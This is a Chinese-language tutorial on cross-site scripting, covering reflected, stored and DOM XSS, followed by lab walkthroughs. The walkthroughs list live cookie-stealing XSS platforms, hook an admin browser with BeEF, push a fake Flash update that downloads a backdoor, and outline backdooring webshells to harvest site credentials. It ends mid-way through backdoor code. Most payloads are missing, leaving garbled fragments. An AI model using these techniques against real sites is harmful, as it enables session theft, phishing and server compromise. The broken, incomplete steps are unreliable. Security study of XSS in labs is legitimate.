跨站脚本攻击XSS(最全最细致的靶场实战)
一、XSS跨站漏洞
(1)XSS简介
网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting,安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS)有所区分,故称XSS)的威胁,而静态站点则完全不受其影响。恶意攻击者会在 Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
跨站脚本攻击是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。它允许恶意用户将代码注入网页,其他用户在浏览网页时会受到影响,恶意用户利用xss 代码攻击成功后,可能得到很高的权限、私密网页内容、会话和cookie等各种内容
攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大的网络钓鱼(Phishing)攻击而变得广为人知。对于跨站脚本攻击,黑客界共识是:跨站脚本攻击是新型的“缓冲区溢出攻击”,而JavaScript是新型的“ShellCode”。
xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。
$xss = $_GET['x'];
echo $xss;
?>
(2)产生层面
产生层面一般都是在前端,JavaScript代码能干什么,执行之后就会达到相应的效果
(3)函数类
比如说php中的脚本的输出函数
常见的输出函数有:print、print_r、echo、printf、sprintf、die、var_dump、var_export
(4)危害影响
-
盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号
-
控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力
-
盗窃企业重要的具有商业价值的资料
-
非法转账
-
强制发送电子邮件
-
网站挂马
-
控制受害者机器向其它网站发起攻击
其实归根结底,XSS的攻击方式就是想办法“教唆”用户的浏览器去执行一些这个网页中原本不存在的前端代码。可问题在于尽管一个信息框突然弹出来并不怎么友好,但也不至于会造成什么真实伤害啊。的确如此,但要说明的是,这里拿信息框说事仅仅是为了举个栗子,真正的黑客攻击在XSS中除非恶作剧,不然是不会在恶意植入代码中写上alert("say something")的。在真正的应用中,XSS攻击可以干的事情还有很多,这里举两个例子。
-
窃取网页浏览中的cookie值。在网页浏览中我们常常涉及到用户登录,登录完毕之后服务端会返回一个cookie值。这个cookie值相当于一个令牌,拿着这张令牌就等同于证明了你是某个用户。如果你的cookie值被窃取,那么攻击者很可能能够直接利用你的这张令牌不用密码就登录你的账户。如果想要通过script脚本获得当前页面的cookie值,通常会用到cookie。试想下如果像空间说说中能够写入xss攻击语句,那岂不是看了你说说的人的号你都可以登录(不过貌似QQ的cookie有其他验证措施保证同一cookie不能被滥用)
-
劫持流量实现恶意跳转。这个很简单,就是在网页中想办法插入一句像这样的语句:
那么所访问的网站就会被跳转到百度的首页。早在2011年新浪就曾爆出过严重的xss漏洞,导致大量用户自动关注某个微博号并自动转发某条微博。具体各位可以自行百度。
(5)浏览器内核版本
利用XSS需要浏览器版本和内核没有过滤XSS攻击(比如用谷歌Edge火狐等打开可以成功,但是IE却会拦截)
(6)常出现场景
文章发表、评论、留言、注册资料的地方、修改资料的地方等
二、XSS攻击的分类
XSS攻击分成两类,一类是来自内部的攻击,另一类则是来自外部的攻击
(1)来自内部的攻击
主要指的是利用程序自身的漏洞,构造跨站语句,如:dvbbs的showerror.asp存在的跨站漏洞。
(2)来自外部的攻击
主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。如当我们要渗透一个站点,我们自己构造一个有跨站漏洞的网页,然后构造跨站语句,通过结合其它技术,如社会工程学等,欺骗目标服务器的管理员打开。
三、XSS的分类
1、反射型(非持久化)
(1)原理
反射型xss又称非持久型xss,是目前最普遍的类型,这种攻击方式往往具有一次性。发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码。这个过程像一次反射,所以称反射型XSS。
(2)攻击方式
攻击者通过电子邮件等方式将包含xss代码的恶意链接发送给目标用户。当目标用户访问该链接时,服务器接受该用户的请求并进行处理,然后服务器把带有xss代码的数据发送给目标用户的浏览器,浏览器解析这段带有xss代码的恶意脚本后就会触发xss漏洞
(3)判断是否存在反射型xss漏洞并利用
① 判断有没有过滤一些特殊的字符
比如对比输出的字符和输出的字符,可以看到有些字符被过滤了
② 注入代码
下面是大概的原理
假如我输入的是1,提交后,点击查看网页源代码
③ 插入代码
"> #如果读取图片失败,则用alert显示相关信息
显示了信息,则说明存在xss注入
可以对比看到,通过前面的闭合以及后面的代码插入,读取不到图片,因此触发了alert弹窗,显示了括号内的内容即/xss/
④ 利用xss漏洞
将刚刚成功注入代码并能触发xss的网址通过电子邮件等方式发送给对方的手中,如果结合xss平台,对方点击了链接,就能得到对方的cookie等信息
2、存储型(持久化)
(1)原理
存储型XSS和反射型XSS的差别仅在于,提交的代码会存储在服务器端(数据库、内存、文件系统等),下次请求目标页面时不用再提交XSS代码。最典型的例子就是留言板XSS,用户提交一条包含XSS代码的留言存储到数据库,目标用户查看留言板时,那些留言就会从数据库中加载出来并显示,于是触发了XSS攻击
(2)攻击方式
这种攻击多见于论坛、博客和留言板中,攻击者在发帖的过程中,将恶意脚本连同正常的信息一起注入帖子的内容中。随着帖子被服务器存储下来,恶意脚本也永久的存放在服务器的后端存储器中。当其他用户浏览这个被注入了恶意脚本的帖子时,恶意脚本会在它们的浏览器中得到执行
(3)payload
注入后重新刷新发现直接回显注入的东西,说明是存储型xss
3、DOM型
(1)原理
文档对象模型Document Object Model(DOM)是一个与平台、编程语言不相干的接口,允许程序或脚本动态地访问和更新文档内容、结构和样式,处理后的结果会成为展示页面的一部分
DOM型xss其实是一种特殊类型的反射型xss,也被称作本地跨站,它是基于DOM文档对象模型的一种漏洞。DOM XSS和反射型XSS、存储型XSS的区别在于DOM XSS代码并不需要服务器参与,出发XSS靠的是浏览器的DOM解析,完全是客户端的事情
DOM中有很多对象,其中一些对象可以被用户所操纵,如url,location等。客户端的脚本程序可以通过DOM来动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而是从客户端取得DOM中的数据后并在本地执行,因此仅从服务器端是没有办法防御DOM型XSS漏洞的,如若DOM中的数据没有经过严格的验证,便会产生基于DOM的XSS漏洞。
基于DOM的XSS是反射的特例,其中JavaScript隐藏在URL中,并在其呈现时由页面中的JavaScript取出,而不是在提供服务时嵌入到页面中。这可以使其比其他攻击更隐蔽,并且监控页面正文的WAF或其他防护检测不出恶意内容。
(2)攻击方式
用户请求一个经过专门设计的URL,它由攻击者提交,而且其中包含xss代码。服务器的响应不会以任何的形式包含攻击者的脚本,当用户的浏览器处理这个响应时,DOM对象就会处理xss代码,导致存在xss漏洞
(3)payload
四、XSS攻击的途径
XSS攻击方法只是利用HTML的属性做各种尝试,找出注入的方法。现在对三种XSS攻击的主要方式进行分析。
-
第一种:对普通的用户输入,页面原样输出,攻击者通过对JSCODE的伪装,经过某些特定的操作就会跳出一个木马界面,从而取得登录用户的Cookie.
-
第二种:在代码区内存在有用户输入的内容
-
第三种:允许用户输入HTML标签的页面,用户可以提交一些自定义的HTML代码。
五、靶场实战
1、PHP开源多功能留言板
(1)搭建靶场
PHP开源多功能留言板下载地址:https://down.chinaz.com/soft/37581.htm ,按照教程安装即可
(2)XSS平台
-
网址1:https://xss.pt/xss.php
-
网址2:http://xss.fbisb.com/xss.php
-
网址3:https://xss8.cc/login/
-
网址4:https://xsshs.cn/xss.php?do=login
(3)进行攻击
① 初次尝试
尝试用简单的JS代码进行XSS攻击
存在JS过滤
② 绕过
管理员在后台进行查看时就会弹出弹窗
正是因为我们的JS代码嵌入到了其中
② XSS平台获取cookie
选择XSS平台的攻击代码
提交
管理员在后台查看时就会触发攻击代码
此时在XSS平台就能查看到获取的信息
③ postman登录后台
postman下载地址:https://www.postman.com/downloads/
(4)Beef结合XSS攻击
① 安装Beef-xss
最新版kali安装beef-xss
apt-get install beef-xss
如果遇到找不到包
解决方案
# 编辑文件
sudo vim /etc/apt/sources.list
# 添加旧的资源信息
deb http://http.kali.org/kali kali-rolling main contrib non-free
# For source package access, uncomment the following line
# deb-src http://http.kali.org/kali kali-rolling main contrib non-free
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free
# For source package access, uncomment the following line
# deb-src http://http.kali.org/kali sana main non-free contrib
# deb-src http://security.kali.org/kali-security sana/updates main contrib non-free
deb http://old.kali.org/kali moto main non-free contrib
# For source package access, uncomment the following line
# deb-src http://old.kali.org/kali moto main non-free contrib
# 更新资源列表
sudo apt-get update
更新完毕后重新安装目标应用即可
安装完成后,直接使用beef-xss启动会有启动失败的问题,目前还不知道解决方法
但是可以进入/usr/share/beef-xss/目录,使用./beef启动即可
如果需要修改登录账号密码可以修改config.yaml文件
② 使用beef-xss
启动beef后,插入钩子,提交
后台管理员查看订单触发XSS
成功上线
获取Cookie
浏览器跳转
社工攻击,利用模拟Flash更新向客户端发送请求,来实现下载后门
客户端显示,点击就下载后门
4、WebShell箱子管理系统
就是使用别人的webshell来进行获取服务器shell,但获取shell后webshell存在的恶意代码就会把网站信息和webshell密码,和用户名发到webshell的原主人来进行信息收集,通过大量获取的网站shell来进行贩卖,而使用webshell的人就成打工仔了。
反杀的意思就是像上面的窃取cookie道理一样通过向webshell的代码中插入窃取cookie的代码,当webshell 原注入查看沙箱时就会触发xss窃取cookie来达到反客为主!
既然说到了WebShell,推荐一个WebShell库:https://github.com/tennc/webshell
(1)搭建靶场
① 靶场下载
靶场下载:链接:https://pan.baidu.com/s/1ym_f9HDjejY2YLAMJmtAKA
提取码:gay7
② 小旋风下载
搭建一个asp的服务器,我们这里选用小旋风进行搭建http://lt.yx12345.com:90/yasuobao/jyx12345xiaoxuanfenglinshiaspfuwuqiminiban.zip,下载完成后解压到虚拟机里面
默认端口为80。如果80端口被占用或不想用80可用记事本打开host.ini增加端口网站服务
③ 靶场搭建
将下载好的webshell箱子放在搭建好的服务器里面,这里我放到了8001端口下
这里存在一个问题,访问该网址时只能访问http://localhost:8001/xxx ,访问127.0.0.1或者内网IP地址都会报418 Host Not Found的错误
经过排查终于知道是哪里出了问题,只需要将这里修改成对应的IP地址,重启服务即可
假如我们向wolke.cn传入了别人留了后门的木马,进行连接,访问了http://10.3.14.17:8001/api.asp?url=wolke.cn&pass=sqzr&id=1 ,这个时候别人在后台就能看到我们的webshell,坐收渔翁之利
(2)进行攻击
① 模拟webshell原作者进行后门攻击
登录后台(账号密码都为:admin)
去找一个免杀WebShell,然后加上我自己的后门
$password = "sqzr";
$url = $_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']; // HTTP_HOST当前请求头中 Host: 项的内容;PHP_SELF当前执行脚本的文件名
echo "